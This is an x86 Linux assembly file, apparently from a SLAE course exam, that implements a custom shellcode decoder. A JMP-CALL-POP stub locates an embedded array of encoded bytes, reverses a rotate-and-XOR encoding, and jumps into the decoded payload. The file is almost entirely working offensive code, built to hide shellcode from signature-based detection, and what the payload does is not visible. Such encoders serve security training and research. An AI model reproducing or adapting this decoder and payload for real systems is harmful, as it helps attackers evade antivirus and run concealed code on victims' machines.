; Filename: 	decoder.nasm
; Author:  	Jakub Heba
; Purpose:	SLAE Course & Exam


global _start
section .text write
_start:
        jmp short call_shellcode

decoder:
        pop esi
        xor eax, eax
	mul ecx
        xor ebx, ebx
        mov bl, 0xaa

decode:
        mov al, byte [esi+edx]
	rol al, 0x3
	xor al, byte [esi+edx+1]
	add dl, 2
	mov byte [esi+ecx],al
	inc cl

        cmp bl, byte [esi+edx]
        jnz decode

        cmp bl, byte [esi+edx+1]
        jnz decode

        jmp short shellcode

call_shellcode:
        call decoder
	shellcode: db 0x20,0x30,0xf4,0x67,0x3c,0xd0,0xdf,0x25,0xad,0x5c,0xed,0xa6,0xd8,0xf7,0x1f,0x2a,0xb5,0x1d,0x67,0x5d,0x3f,0x4a,0xe1,0x0e,0x70,0xb2,0x7a,0x25,0x7b,0x8d,0x4a,0x38,0x48,0x43,0x81,0x66,0xd4,0xa4,0x01,0x81,0x31,0x68,0xf8,0x0a,0x29,0xc9,0xe2,0x9e,0x31,0x4b,0x32,0x21,0x8c,0x02,0xe0,0xb4,0xcc,0x65,0xac,0x33,0x2b,0xe0,0x40,0x86,0x80,0x01,0xbe,0xf0,0xfe,0xf1,0xb0,0x04,0x1d,0x01,0x37,0xbc,0xf9,0xca,0x56,0xb7,0x5e,0xf7,0xa7,0x6c,0x30,0xe7,0x07,0x50,0xa8,0x54,0x7f,0xa7,0xe0,0x61,0x08,0x2a,0x9d,0xee,0xe4,0xae,0xd9,0x2f,0x6e,0x19,0x2c,0x71,0x84,0x75,0x8c,0x36,0x75,0x22,0x70,0x62,0x9b,0x11,0x03,0x98,0xb7,0x0d,0x83,0x23,0x54,0x2b,0x43,0xc9,0x14,0x91,0x06,0xf9,0x19,0x05,0x04,0xa0,0xa1,0xbd,0xa8,0x7a,0x23,0xa8,0x42,0x13,0xaa,0x98,0xc1,0x8e,0x85,0x9c,0xe0,0x38,0x07,0x89,0x30,0x83,0x2d,0xa4,0x15,0x28,0xeb,0xef,0x09,0x43,0x2d,0x58,0xcb,0xa8,0x83,0x4a,0x1b,0xb0,0xd0,0xe8,0xc2,0x39,0x53,0xe9,0x88,0x2c,0x67,0x53,0x7c,0xcc,0xdd,0xc1,0x3e,0x93,0xe5,0x46,0xa3,0x94,0x04,0xc3,0xc1,0x3f,0xd3,0x57,0x72,0xa2,0xdd,0x3c,0xb8,0x08,0x09,0xc8,0xaa,0xaa
